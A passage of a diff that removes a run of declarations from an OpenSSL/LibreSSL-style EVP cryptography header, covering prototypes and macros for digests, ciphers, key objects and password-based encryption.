-#define EVP_DigestVerifyUpdate(a,b,c)	EVP_DigestUpdate(a,b,c)
-
-#define BIO_set_md(b,md)		BIO_ctrl(b,BIO_C_SET_MD,0,(char *)md)
-#define BIO_get_md(b,mdp)		BIO_ctrl(b,BIO_C_GET_MD,0,(char *)mdp)
-#define BIO_get_md_ctx(b,mdcp)     BIO_ctrl(b,BIO_C_GET_MD_CTX,0,(char *)mdcp)
-#define BIO_set_md_ctx(b,mdcp)     BIO_ctrl(b,BIO_C_SET_MD_CTX,0,(char *)mdcp)
-#define BIO_get_cipher_status(b)	BIO_ctrl(b,BIO_C_GET_CIPHER_STATUS,0,NULL)
-#define BIO_get_cipher_ctx(b,c_pp)	BIO_ctrl(b,BIO_C_GET_CIPHER_CTX,0,(char *)c_pp)
-
-int EVP_Cipher(EVP_CIPHER_CTX *c, unsigned char *out, const unsigned char *in,
-    unsigned int inl);
-
-#define EVP_add_cipher_alias(n,alias) \
-	OBJ_NAME_add((alias),OBJ_NAME_TYPE_CIPHER_METH|OBJ_NAME_ALIAS,(n))
-#define EVP_add_digest_alias(n,alias) \
-	OBJ_NAME_add((alias),OBJ_NAME_TYPE_MD_METH|OBJ_NAME_ALIAS,(n))
-#define EVP_delete_cipher_alias(alias) \
-	OBJ_NAME_remove(alias,OBJ_NAME_TYPE_CIPHER_METH|OBJ_NAME_ALIAS);
-#define EVP_delete_digest_alias(alias) \
-	OBJ_NAME_remove(alias,OBJ_NAME_TYPE_MD_METH|OBJ_NAME_ALIAS);
-
-void EVP_MD_CTX_init(EVP_MD_CTX *ctx);
-int EVP_MD_CTX_cleanup(EVP_MD_CTX *ctx);
-EVP_MD_CTX *EVP_MD_CTX_create(void);
-void EVP_MD_CTX_destroy(EVP_MD_CTX *ctx);
-int EVP_MD_CTX_copy_ex(EVP_MD_CTX *out, const EVP_MD_CTX *in);
-void EVP_MD_CTX_set_flags(EVP_MD_CTX *ctx, int flags);
-void EVP_MD_CTX_clear_flags(EVP_MD_CTX *ctx, int flags);
-int EVP_MD_CTX_ctrl(EVP_MD_CTX *ctx, int type, int arg, void *ptr);
-int EVP_MD_CTX_test_flags(const EVP_MD_CTX *ctx, int flags);
-int EVP_DigestInit_ex(EVP_MD_CTX *ctx, const EVP_MD *type, ENGINE *impl);
-int EVP_DigestUpdate(EVP_MD_CTX *ctx, const void *d, size_t cnt);
-int EVP_DigestFinal_ex(EVP_MD_CTX *ctx, unsigned char *md, unsigned int *s);
-int EVP_Digest(const void *data, size_t count, unsigned char *md,
-    unsigned int *size, const EVP_MD *type, ENGINE *impl);
-
-int EVP_MD_CTX_copy(EVP_MD_CTX *out, const EVP_MD_CTX *in);
-int EVP_DigestInit(EVP_MD_CTX *ctx, const EVP_MD *type);
-int EVP_DigestFinal(EVP_MD_CTX *ctx, unsigned char *md, unsigned int *s);
-
-int EVP_read_pw_string(char *buf, int length, const char *prompt, int verify);
-int EVP_read_pw_string_min(char *buf, int minlen, int maxlen,
-    const char *prompt, int verify);
-void EVP_set_pw_prompt(const char *prompt);
-char *EVP_get_pw_prompt(void);
-
-int EVP_BytesToKey(const EVP_CIPHER *type, const EVP_MD *md,
-    const unsigned char *salt, const unsigned char *data, int datal, int count,
-    unsigned char *key, unsigned char *iv);
-
-void EVP_CIPHER_CTX_set_flags(EVP_CIPHER_CTX *ctx, int flags);
-void EVP_CIPHER_CTX_clear_flags(EVP_CIPHER_CTX *ctx, int flags);
-int EVP_CIPHER_CTX_test_flags(const EVP_CIPHER_CTX *ctx, int flags);
-
-int EVP_EncryptInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
-    const unsigned char *key, const unsigned char *iv);
-int EVP_EncryptInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
-    ENGINE *impl, const unsigned char *key, const unsigned char *iv);
-int EVP_EncryptUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl,
-    const unsigned char *in, int inl);
-int EVP_EncryptFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl);
-#ifndef LIBRESSL_INTERNAL
-int EVP_EncryptFinal(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl);
-#endif
-
-int EVP_DecryptInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
-    const unsigned char *key, const unsigned char *iv);
-int EVP_DecryptInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
-    ENGINE *impl, const unsigned char *key, const unsigned char *iv);
-int EVP_DecryptUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl,
-    const unsigned char *in, int inl);
-int EVP_DecryptFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *outm, int *outl);
-#ifndef LIBRESSL_INTERNAL
-int EVP_DecryptFinal(EVP_CIPHER_CTX *ctx, unsigned char *outm, int *outl);
-#endif
-
-int EVP_CipherInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
-    const unsigned char *key, const unsigned char *iv, int enc);
-int EVP_CipherInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
-    ENGINE *impl, const unsigned char *key, const unsigned char *iv, int enc);
-int EVP_CipherUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl,
-    const unsigned char *in, int inl);
-int EVP_CipherFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *outm, int *outl);
-#ifndef LIBRESSL_INTERNAL
-int EVP_CipherFinal(EVP_CIPHER_CTX *ctx, unsigned char *outm, int *outl);
-#endif
-	
-int EVP_SignFinal(EVP_MD_CTX *ctx, unsigned char *md, unsigned int *s,
-    EVP_PKEY *pkey);
-
-int EVP_VerifyFinal(EVP_MD_CTX *ctx, const unsigned char *sigbuf,
-    unsigned int siglen, EVP_PKEY *pkey);
-
-int EVP_DigestSignInit(EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
-    const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey);
-int EVP_DigestSignFinal(EVP_MD_CTX *ctx, unsigned char *sigret, size_t *siglen);
-
-int EVP_DigestVerifyInit(EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
-    const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey);
-int EVP_DigestVerifyFinal(EVP_MD_CTX *ctx, unsigned char *sig, size_t siglen);
-
-int EVP_OpenInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
-    const unsigned char *ek, int ekl, const unsigned char *iv, EVP_PKEY *priv);
-int EVP_OpenFinal(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl);
-
-int EVP_SealInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
-    unsigned char **ek, int *ekl, unsigned char *iv, EVP_PKEY **pubk,
-    int npubk);
-int EVP_SealFinal(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl);
-
-void EVP_EncodeInit(EVP_ENCODE_CTX *ctx);
-void EVP_EncodeUpdate(EVP_ENCODE_CTX *ctx, unsigned char *out, int *outl,
-    const unsigned char *in, int inl);
-void EVP_EncodeFinal(EVP_ENCODE_CTX *ctx, unsigned char *out, int *outl);
-int EVP_EncodeBlock(unsigned char *t, const unsigned char *f, int n);
-
-void EVP_DecodeInit(EVP_ENCODE_CTX *ctx);
-int EVP_DecodeUpdate(EVP_ENCODE_CTX *ctx, unsigned char *out, int *outl,
-    const unsigned char *in, int inl);
-int EVP_DecodeFinal(EVP_ENCODE_CTX *ctx, unsigned char *out, int *outl);
-int EVP_DecodeBlock(unsigned char *t, const unsigned char *f, int n);
-
-void EVP_CIPHER_CTX_init(EVP_CIPHER_CTX *a);
-int EVP_CIPHER_CTX_cleanup(EVP_CIPHER_CTX *a);
-EVP_CIPHER_CTX *EVP_CIPHER_CTX_new(void);
-void EVP_CIPHER_CTX_free(EVP_CIPHER_CTX *a);
-int EVP_CIPHER_CTX_set_key_length(EVP_CIPHER_CTX *x, int keylen);
-int EVP_CIPHER_CTX_set_padding(EVP_CIPHER_CTX *c, int pad);
-int EVP_CIPHER_CTX_ctrl(EVP_CIPHER_CTX *ctx, int type, int arg, void *ptr);
-int EVP_CIPHER_CTX_rand_key(EVP_CIPHER_CTX *ctx, unsigned char *key);
-
-#ifndef OPENSSL_NO_BIO
-BIO_METHOD *BIO_f_md(void);
-BIO_METHOD *BIO_f_base64(void);
-BIO_METHOD *BIO_f_cipher(void);
-void BIO_set_cipher(BIO *b, const EVP_CIPHER *c, const unsigned char *k,
-    const unsigned char *i, int enc);
-#endif
-
-const EVP_MD *EVP_md_null(void);
-#ifndef OPENSSL_NO_MD4
-const EVP_MD *EVP_md4(void);
-#endif
-#ifndef OPENSSL_NO_MD5
-const EVP_MD *EVP_md5(void);
-const EVP_MD *EVP_md5_sha1(void);
-#endif
-#ifndef OPENSSL_NO_SHA
-const EVP_MD *EVP_sha1(void);
-const EVP_MD *EVP_dss(void);
-const EVP_MD *EVP_dss1(void);
-const EVP_MD *EVP_ecdsa(void);
-#endif
-#ifndef OPENSSL_NO_SHA256
-const EVP_MD *EVP_sha224(void);
-const EVP_MD *EVP_sha256(void);
-#endif
-#ifndef OPENSSL_NO_SHA512
-const EVP_MD *EVP_sha384(void);
-const EVP_MD *EVP_sha512(void);
-#endif
-#ifndef OPENSSL_NO_RIPEMD
-const EVP_MD *EVP_ripemd160(void);
-#endif
-#ifndef OPENSSL_NO_WHIRLPOOL
-const EVP_MD *EVP_whirlpool(void);
-#endif
-#ifndef OPENSSL_NO_GOST
-const EVP_MD *EVP_gostr341194(void);
-const EVP_MD *EVP_gost2814789imit(void);
-const EVP_MD *EVP_streebog256(void);
-const EVP_MD *EVP_streebog512(void);
-#endif
-const EVP_CIPHER *EVP_enc_null(void);		/* does nothing :-) */
-#ifndef OPENSSL_NO_DES
-const EVP_CIPHER *EVP_des_ecb(void);
-const EVP_CIPHER *EVP_des_ede(void);
-const EVP_CIPHER *EVP_des_ede3(void);
-const EVP_CIPHER *EVP_des_ede_ecb(void);
-const EVP_CIPHER *EVP_des_ede3_ecb(void);
-const EVP_CIPHER *EVP_des_cfb64(void);
-# define EVP_des_cfb EVP_des_cfb64
-const EVP_CIPHER *EVP_des_cfb1(void);
-const EVP_CIPHER *EVP_des_cfb8(void);
-const EVP_CIPHER *EVP_des_ede_cfb64(void);
-# define EVP_des_ede_cfb EVP_des_ede_cfb64
-const EVP_CIPHER *EVP_des_ede3_cfb64(void);
-# define EVP_des_ede3_cfb EVP_des_ede3_cfb64
-const EVP_CIPHER *EVP_des_ede3_cfb1(void);
-const EVP_CIPHER *EVP_des_ede3_cfb8(void);
-const EVP_CIPHER *EVP_des_ofb(void);
-const EVP_CIPHER *EVP_des_ede_ofb(void);
-const EVP_CIPHER *EVP_des_ede3_ofb(void);
-const EVP_CIPHER *EVP_des_cbc(void);
-const EVP_CIPHER *EVP_des_ede_cbc(void);
-const EVP_CIPHER *EVP_des_ede3_cbc(void);
-const EVP_CIPHER *EVP_desx_cbc(void);
-#endif
-#ifndef OPENSSL_NO_RC4
-const EVP_CIPHER *EVP_rc4(void);
-const EVP_CIPHER *EVP_rc4_40(void);
-#ifndef OPENSSL_NO_MD5
-const EVP_CIPHER *EVP_rc4_hmac_md5(void);
-#endif
-#endif
-#ifndef OPENSSL_NO_IDEA
-const EVP_CIPHER *EVP_idea_ecb(void);
-const EVP_CIPHER *EVP_idea_cfb64(void);
-# define EVP_idea_cfb EVP_idea_cfb64
-const EVP_CIPHER *EVP_idea_ofb(void);
-const EVP_CIPHER *EVP_idea_cbc(void);
-#endif
-#ifndef OPENSSL_NO_RC2
-const EVP_CIPHER *EVP_rc2_ecb(void);
-const EVP_CIPHER *EVP_rc2_cbc(void);
-const EVP_CIPHER *EVP_rc2_40_cbc(void);
-const EVP_CIPHER *EVP_rc2_64_cbc(void);
-const EVP_CIPHER *EVP_rc2_cfb64(void);
-# define EVP_rc2_cfb EVP_rc2_cfb64
-const EVP_CIPHER *EVP_rc2_ofb(void);
-#endif
-#ifndef OPENSSL_NO_BF
-const EVP_CIPHER *EVP_bf_ecb(void);
-const EVP_CIPHER *EVP_bf_cbc(void);
-const EVP_CIPHER *EVP_bf_cfb64(void);
-# define EVP_bf_cfb EVP_bf_cfb64
-const EVP_CIPHER *EVP_bf_ofb(void);
-#endif
-#ifndef OPENSSL_NO_CAST
-const EVP_CIPHER *EVP_cast5_ecb(void);
-const EVP_CIPHER *EVP_cast5_cbc(void);
-const EVP_CIPHER *EVP_cast5_cfb64(void);
-# define EVP_cast5_cfb EVP_cast5_cfb64
-const EVP_CIPHER *EVP_cast5_ofb(void);
-#endif
-#ifndef OPENSSL_NO_AES
-const EVP_CIPHER *EVP_aes_128_ecb(void);
-const EVP_CIPHER *EVP_aes_128_cbc(void);
-const EVP_CIPHER *EVP_aes_128_cfb1(void);
-const EVP_CIPHER *EVP_aes_128_cfb8(void);
-const EVP_CIPHER *EVP_aes_128_cfb128(void);
-# define EVP_aes_128_cfb EVP_aes_128_cfb128
-const EVP_CIPHER *EVP_aes_128_ofb(void);
-const EVP_CIPHER *EVP_aes_128_ctr(void);
-const EVP_CIPHER *EVP_aes_128_ccm(void);
-const EVP_CIPHER *EVP_aes_128_gcm(void);
-const EVP_CIPHER *EVP_aes_128_xts(void);
-const EVP_CIPHER *EVP_aes_192_ecb(void);
-const EVP_CIPHER *EVP_aes_192_cbc(void);
-const EVP_CIPHER *EVP_aes_192_cfb1(void);
-const EVP_CIPHER *EVP_aes_192_cfb8(void);
-const EVP_CIPHER *EVP_aes_192_cfb128(void);
-# define EVP_aes_192_cfb EVP_aes_192_cfb128
-const EVP_CIPHER *EVP_aes_192_ofb(void);
-const EVP_CIPHER *EVP_aes_192_ctr(void);
-const EVP_CIPHER *EVP_aes_192_ccm(void);
-const EVP_CIPHER *EVP_aes_192_gcm(void);
-const EVP_CIPHER *EVP_aes_256_ecb(void);
-const EVP_CIPHER *EVP_aes_256_cbc(void);
-const EVP_CIPHER *EVP_aes_256_cfb1(void);
-const EVP_CIPHER *EVP_aes_256_cfb8(void);
-const EVP_CIPHER *EVP_aes_256_cfb128(void);
-# define EVP_aes_256_cfb EVP_aes_256_cfb128
-const EVP_CIPHER *EVP_aes_256_ofb(void);
-const EVP_CIPHER *EVP_aes_256_ctr(void);
-const EVP_CIPHER *EVP_aes_256_ccm(void);
-const EVP_CIPHER *EVP_aes_256_gcm(void);
-const EVP_CIPHER *EVP_aes_256_xts(void);
-#if !defined(OPENSSL_NO_SHA) && !defined(OPENSSL_NO_SHA1)
-const EVP_CIPHER *EVP_aes_128_cbc_hmac_sha1(void);
-const EVP_CIPHER *EVP_aes_256_cbc_hmac_sha1(void);
-#endif
-#endif
-#ifndef OPENSSL_NO_CAMELLIA
-const EVP_CIPHER *EVP_camellia_128_ecb(void);
-const EVP_CIPHER *EVP_camellia_128_cbc(void);
-const EVP_CIPHER *EVP_camellia_128_cfb1(void);
-const EVP_CIPHER *EVP_camellia_128_cfb8(void);
-const EVP_CIPHER *EVP_camellia_128_cfb128(void);
-# define EVP_camellia_128_cfb EVP_camellia_128_cfb128
-const EVP_CIPHER *EVP_camellia_128_ofb(void);
-const EVP_CIPHER *EVP_camellia_192_ecb(void);
-const EVP_CIPHER *EVP_camellia_192_cbc(void);
-const EVP_CIPHER *EVP_camellia_192_cfb1(void);
-const EVP_CIPHER *EVP_camellia_192_cfb8(void);
-const EVP_CIPHER *EVP_camellia_192_cfb128(void);
-# define EVP_camellia_192_cfb EVP_camellia_192_cfb128
-const EVP_CIPHER *EVP_camellia_192_ofb(void);
-const EVP_CIPHER *EVP_camellia_256_ecb(void);
-const EVP_CIPHER *EVP_camellia_256_cbc(void);
-const EVP_CIPHER *EVP_camellia_256_cfb1(void);
-const EVP_CIPHER *EVP_camellia_256_cfb8(void);
-const EVP_CIPHER *EVP_camellia_256_cfb128(void);
-# define EVP_camellia_256_cfb EVP_camellia_256_cfb128
-const EVP_CIPHER *EVP_camellia_256_ofb(void);
-#endif
-
-#ifndef OPENSSL_NO_CHACHA
-const EVP_CIPHER *EVP_chacha20(void);
-#endif
-
-#ifndef OPENSSL_NO_GOST
-const EVP_CIPHER *EVP_gost2814789_ecb(void);
-const EVP_CIPHER *EVP_gost2814789_cfb64(void);
-const EVP_CIPHER *EVP_gost2814789_cnt(void);
-#endif
-
-void OPENSSL_add_all_algorithms_noconf(void);
-void OPENSSL_add_all_algorithms_conf(void);
-
-#ifdef OPENSSL_LOAD_CONF
-#define OpenSSL_add_all_algorithms() OPENSSL_add_all_algorithms_conf()
-#else
-#define OpenSSL_add_all_algorithms() OPENSSL_add_all_algorithms_noconf()
-#endif
-
-void OpenSSL_add_all_ciphers(void);
-void OpenSSL_add_all_digests(void);
-
-#define SSLeay_add_all_algorithms() OpenSSL_add_all_algorithms()
-#define SSLeay_add_all_ciphers() OpenSSL_add_all_ciphers()
-#define SSLeay_add_all_digests() OpenSSL_add_all_digests()
-
-int EVP_add_cipher(const EVP_CIPHER *cipher);
-int EVP_add_digest(const EVP_MD *digest);
-
-const EVP_CIPHER *EVP_get_cipherbyname(const char *name);
-const EVP_MD *EVP_get_digestbyname(const char *name);
-void EVP_cleanup(void);
-
-void EVP_CIPHER_do_all(void (*fn)(const EVP_CIPHER *ciph, const char *from,
-    const char *to, void *x), void *arg);
-void EVP_CIPHER_do_all_sorted(void (*fn)(const EVP_CIPHER *ciph,
-    const char *from, const char *to, void *x), void *arg);
-
-void EVP_MD_do_all(void (*fn)(const EVP_MD *ciph, const char *from,
-    const char *to, void *x), void *arg);
-void EVP_MD_do_all_sorted(void (*fn)(const EVP_MD *ciph, const char *from,
-    const char *to, void *x), void *arg);
-
-int EVP_PKEY_decrypt_old(unsigned char *dec_key, const unsigned char *enc_key,
-    int enc_key_len, EVP_PKEY *private_key);
-int EVP_PKEY_encrypt_old(unsigned char *enc_key, const unsigned char *key,
-    int key_len, EVP_PKEY *pub_key);
-int EVP_PKEY_type(int type);
-int EVP_PKEY_id(const EVP_PKEY *pkey);
-int EVP_PKEY_base_id(const EVP_PKEY *pkey);
-int EVP_PKEY_bits(EVP_PKEY *pkey);
-int EVP_PKEY_size(EVP_PKEY *pkey);
-int EVP_PKEY_set_type(EVP_PKEY *pkey, int type);
-int EVP_PKEY_set_type_str(EVP_PKEY *pkey, const char *str, int len);
-int EVP_PKEY_assign(EVP_PKEY *pkey, int type, void *key);
-void *EVP_PKEY_get0(EVP_PKEY *pkey);
-
-#ifndef OPENSSL_NO_RSA
-struct rsa_st;
-int EVP_PKEY_set1_RSA(EVP_PKEY *pkey, struct rsa_st *key);
-struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
-#endif
-#ifndef OPENSSL_NO_DSA
-struct dsa_st;
-int EVP_PKEY_set1_DSA(EVP_PKEY *pkey, struct dsa_st *key);
-struct dsa_st *EVP_PKEY_get1_DSA(EVP_PKEY *pkey);
-#endif
-#ifndef OPENSSL_NO_DH
-struct dh_st;
-int EVP_PKEY_set1_DH(EVP_PKEY *pkey, struct dh_st *key);
-struct dh_st *EVP_PKEY_get1_DH(EVP_PKEY *pkey);
-#endif
-#ifndef OPENSSL_NO_EC
-struct ec_key_st;
-int EVP_PKEY_set1_EC_KEY(EVP_PKEY *pkey, struct ec_key_st *key);
-struct ec_key_st *EVP_PKEY_get1_EC_KEY(EVP_PKEY *pkey);
-#endif
-#ifndef OPENSSL_NO_GOST
-struct gost_key_st;
-#endif
-
-EVP_PKEY *EVP_PKEY_new(void);
-void EVP_PKEY_free(EVP_PKEY *pkey);
-
-EVP_PKEY *d2i_PublicKey(int type, EVP_PKEY **a, const unsigned char **pp,
-    long length);
-int i2d_PublicKey(EVP_PKEY *a, unsigned char **pp);
-
-EVP_PKEY *d2i_PrivateKey(int type, EVP_PKEY **a, const unsigned char **pp,
-    long length);
-EVP_PKEY *d2i_AutoPrivateKey(EVP_PKEY **a, const unsigned char **pp,
-    long length);
-int i2d_PrivateKey(EVP_PKEY *a, unsigned char **pp);
-
-int EVP_PKEY_copy_parameters(EVP_PKEY *to, const EVP_PKEY *from);
-int EVP_PKEY_missing_parameters(const EVP_PKEY *pkey);
-int EVP_PKEY_save_parameters(EVP_PKEY *pkey, int mode);
-int EVP_PKEY_cmp_parameters(const EVP_PKEY *a, const EVP_PKEY *b);
-
-int EVP_PKEY_cmp(const EVP_PKEY *a, const EVP_PKEY *b);
-
-int EVP_PKEY_print_public(BIO *out, const EVP_PKEY *pkey, int indent,
-    ASN1_PCTX *pctx);
-int EVP_PKEY_print_private(BIO *out, const EVP_PKEY *pkey, int indent,
-    ASN1_PCTX *pctx);
-int EVP_PKEY_print_params(BIO *out, const EVP_PKEY *pkey, int indent,
-    ASN1_PCTX *pctx);
-
-int EVP_PKEY_get_default_digest_nid(EVP_PKEY *pkey, int *pnid);
-
-int EVP_CIPHER_type(const EVP_CIPHER *ctx);
-
-/* calls methods */
-int EVP_CIPHER_param_to_asn1(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
-int EVP_CIPHER_asn1_to_param(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
-
-/* These are used by EVP_CIPHER methods */
-int EVP_CIPHER_set_asn1_iv(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
-int EVP_CIPHER_get_asn1_iv(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
-
-/* PKCS5 password based encryption */
-int PKCS5_PBE_keyivgen(EVP_CIPHER_CTX *ctx, const char *pass, int passlen,
-    ASN1_TYPE *param, const EVP_CIPHER *cipher, const EVP_MD *md, int en_de);
-int PKCS5_PBKDF2_HMAC_SHA1(const char *pass, int passlen,
-    const unsigned char *salt, int saltlen, int iter, int keylen,
-    unsigned char *out);
-int PKCS5_PBKDF2_HMAC(const char *pass, int passlen, const unsigned char *salt,
-    int saltlen, int iter, const EVP_MD *digest, int keylen,
-    unsigned char *out);
-int PKCS5_v2_PBE_keyivgen(EVP_CIPHER_CTX *ctx, const char *pass, int passlen,
-    ASN1_TYPE *param, const EVP_CIPHER *cipher, const EVP_MD *md,
-    int en_de);
-
-void PKCS5_PBE_add(void);
-
-int EVP_PBE_CipherInit (ASN1_OBJECT *pbe_obj, const char *pass, int passlen,
-    ASN1_TYPE *param, EVP_CIPHER_CTX *ctx, int en_de);
-
-/* PBE type */
-
-/* Can appear as the outermost AlgorithmIdentifier */
-#define EVP_PBE_TYPE_OUTER	0x0
-/* Is an PRF type OID */
-#define EVP_PBE_TYPE_PRF	0x1
-
-int EVP_PBE_alg_add_type(int pbe_type, int pbe_nid, int cipher_nid, int md_nid,
-    EVP_PBE_KEYGEN *keygen);
-int EVP_PBE_alg_add(int nid, const EVP_CIPHER *cipher, const EVP_MD *md,
-    EVP_PBE_KEYGEN *keygen);
-int EVP_PBE_find(int type, int pbe_nid, int *pcnid, int *pmnid,
-    EVP_PBE_KEYGEN **pkeygen);
-void EVP_PBE_cleanup(void);
-
-#define ASN1_PKEY_ALIAS		0x1
-#define ASN1_PKEY_DYNAMIC	0x2
-#define ASN1_PKEY_SIGPARAM_NULL	0x4
-
-#define ASN1_PKEY_CTRL_PKCS7_SIGN	0x1
-#define ASN1_PKEY_CTRL_PKCS7_ENCRYPT	0x2
-#define ASN1_PKEY_CTRL_DEFAULT_MD_NID	0x3
-#define ASN1_PKEY_CTRL_CMS_SIGN		0x5
-#define ASN1_PKEY_CTRL_CMS_ENVELOPE	0x7
-
-int EVP_PKEY_asn1_get_count(void);
-const EVP_PKEY_ASN1_METHOD *EVP_PKEY_asn1_get0(int idx);
-const EVP_PKEY_ASN1_METHOD *EVP_PKEY_asn1_find(ENGINE **pe, int type);
-const EVP_PKEY_ASN1_METHOD *EVP_PKEY_asn1_find_str(ENGINE **pe,
-    const char *str, int len);
-int EVP_PKEY_asn1_add0(const EVP_PKEY_ASN1_METHOD *ameth);
-int EVP_PKEY_asn1_add_alias(int to, int from);
-int EVP_PKEY_asn1_get0_info(int *ppkey_id, int *pkey_base_id, int *ppkey_flags,
-    const char **pinfo, const char **ppem_str,
-    const EVP_PKEY_ASN1_METHOD *ameth);
-
-const EVP_PKEY_ASN1_METHOD* EVP_PKEY_get0_asn1(EVP_PKEY *pkey);
-EVP_PKEY_ASN1_METHOD* EVP_PKEY_asn1_new(int id, int flags, const char *pem_str,
-    const char *info);
-void EVP_PKEY_asn1_copy(EVP_PKEY_ASN1_METHOD *dst,
-    const EVP_PKEY_ASN1_METHOD *src);
-void EVP_PKEY_asn1_free(EVP_PKEY_ASN1_METHOD *ameth);
-void EVP_PKEY_asn1_set_public(EVP_PKEY_ASN1_METHOD *ameth,
-    int (*pub_decode)(EVP_PKEY *pk, X509_PUBKEY *pub),
-    int (*pub_encode)(X509_PUBKEY *pub, const EVP_PKEY *pk),
-    int (*pub_cmp)(const EVP_PKEY *a, const EVP_PKEY *b),
-    int (*pub_print)(BIO *out, const EVP_PKEY *pkey, int indent,
-    ASN1_PCTX *pctx),
-    int (*pkey_size)(const EVP_PKEY *pk),
-    int (*pkey_bits)(const EVP_PKEY *pk));
-void EVP_PKEY_asn1_set_private(EVP_PKEY_ASN1_METHOD *ameth,
-    int (*priv_decode)(EVP_PKEY *pk, PKCS8_PRIV_KEY_INFO *p8inf),
-    int (*priv_encode)(PKCS8_PRIV_KEY_INFO *p8, const EVP_PKEY *pk),
-    int (*priv_print)(BIO *out, const EVP_PKEY *pkey, int indent,
-    ASN1_PCTX *pctx));
-void EVP_PKEY_asn1_set_param(EVP_PKEY_ASN1_METHOD *ameth,
-    int (*param_decode)(EVP_PKEY *pkey, const unsigned char **pder, int derlen),
-    int (*param_encode)(const EVP_PKEY *pkey, unsigned char **pder),
-    int (*param_missing)(const EVP_PKEY *pk),
-    int (*param_copy)(EVP_PKEY *to, const EVP_PKEY *from),
-    int (*param_cmp)(const EVP_PKEY *a, const EVP_PKEY *b),
-    int (*param_print)(BIO *out, const EVP_PKEY *pkey, int indent,
-    ASN1_PCTX *pctx));
-
-void EVP_PKEY_asn1_set_free(EVP_PKEY_ASN1_METHOD *ameth,
-    void (*pkey_free)(EVP_PKEY *pkey));
-void EVP_PKEY_asn1_set_ctrl(EVP_PKEY_ASN1_METHOD *ameth,
-    int (*pkey_ctrl)(EVP_PKEY *pkey, int op, long arg1, void *arg2));
-
-#define EVP_PKEY_OP_UNDEFINED		0
-#define EVP_PKEY_OP_PARAMGEN		(1<<1)
-#define EVP_PKEY_OP_KEYGEN		(1<<2)
-#define EVP_PKEY_OP_SIGN		(1<<3)
-#define EVP_PKEY_OP_VERIFY		(1<<4)
-#define EVP_PKEY_OP_VERIFYRECOVER	(1<<5)
-#define EVP_PKEY_OP_SIGNCTX		(1<<6)
-#define EVP_PKEY_OP_VERIFYCTX		(1<<7)
-#define EVP_PKEY_OP_ENCRYPT		(1<<8)
-#define EVP_PKEY_OP_DECRYPT		(1<<9)
-#define EVP_PKEY_OP_DERIVE		(1<<10)
-
-#define EVP_PKEY_OP_TYPE_SIG	\
-	(EVP_PKEY_OP_SIGN | EVP_PKEY_OP_VERIFY | EVP_PKEY_OP_VERIFYRECOVER \
-		| EVP_PKEY_OP_SIGNCTX | EVP_PKEY_OP_VERIFYCTX)
-
-#define EVP_PKEY_OP_TYPE_CRYPT \
-	(EVP_PKEY_OP_ENCRYPT | EVP_PKEY_OP_DECRYPT)
-
-#define EVP_PKEY_OP_TYPE_NOGEN \
-	(EVP_PKEY_OP_SIG | EVP_PKEY_OP_CRYPT | EVP_PKEY_OP_DERIVE)
-
-#define EVP_PKEY_OP_TYPE_GEN \
-		(EVP_PKEY_OP_PARAMGEN | EVP_PKEY_OP_KEYGEN)
-
-#define	 EVP_PKEY_CTX_set_signature_md(ctx, md)	\
-		EVP_PKEY_CTX_ctrl(ctx, -1, EVP_PKEY_OP_TYPE_SIG,  \
-					EVP_PKEY_CTRL_MD, 0, (void *)md)
-
-#define EVP_PKEY_CTRL_MD		1
-#define EVP_PKEY_CTRL_PEER_KEY		2
-
-#define EVP_PKEY_CTRL_PKCS7_ENCRYPT	3
-#define EVP_PKEY_CTRL_PKCS7_DECRYPT	4
-
-#define EVP_PKEY_CTRL_PKCS7_SIGN	5
-
-#define EVP_PKEY_CTRL_SET_MAC_KEY	6
-
-#define EVP_PKEY_CTRL_DIGESTINIT	7
-
-/* Used by GOST key encryption in TLS */
-#define EVP_PKEY_CTRL_SET_IV 		8
-
-#define EVP_PKEY_CTRL_CMS_ENCRYPT	9
-#define EVP_PKEY_CTRL_CMS_DECRYPT	10
-#define EVP_PKEY_CTRL_CMS_SIGN		11
-
-#define EVP_PKEY_CTRL_CIPHER		12
-
-#define EVP_PKEY_ALG_CTRL		0x1000
-
-
-#define EVP_PKEY_FLAG_AUTOARGLEN	2
-/* Method handles all operations: don't assume any digest related
- * defaults.
- */
-#define EVP_PKEY_FLAG_SIGCTX_CUSTOM	4
-
-const EVP_PKEY_METHOD *EVP_PKEY_meth_find(int type);
-EVP_PKEY_METHOD* EVP_PKEY_meth_new(int id, int flags);
-void EVP_PKEY_meth_get0_info(int *ppkey_id, int *pflags,
-    const EVP_PKEY_METHOD *meth);
-void EVP_PKEY_meth_copy(EVP_PKEY_METHOD *dst, const EVP_PKEY_METHOD *src);
-void EVP_PKEY_meth_free(EVP_PKEY_METHOD *pmeth);
-int EVP_PKEY_meth_add0(const EVP_PKEY_METHOD *pmeth);
-
-EVP_PKEY_CTX *EVP_PKEY_CTX_new(EVP_PKEY *pkey, ENGINE *e);
-EVP_PKEY_CTX *EVP_PKEY_CTX_new_id(int id, ENGINE *e);
-EVP_PKEY_CTX *EVP_PKEY_CTX_dup(EVP_PKEY_CTX *ctx);
-void EVP_PKEY_CTX_free(EVP_PKEY_CTX *ctx);
-
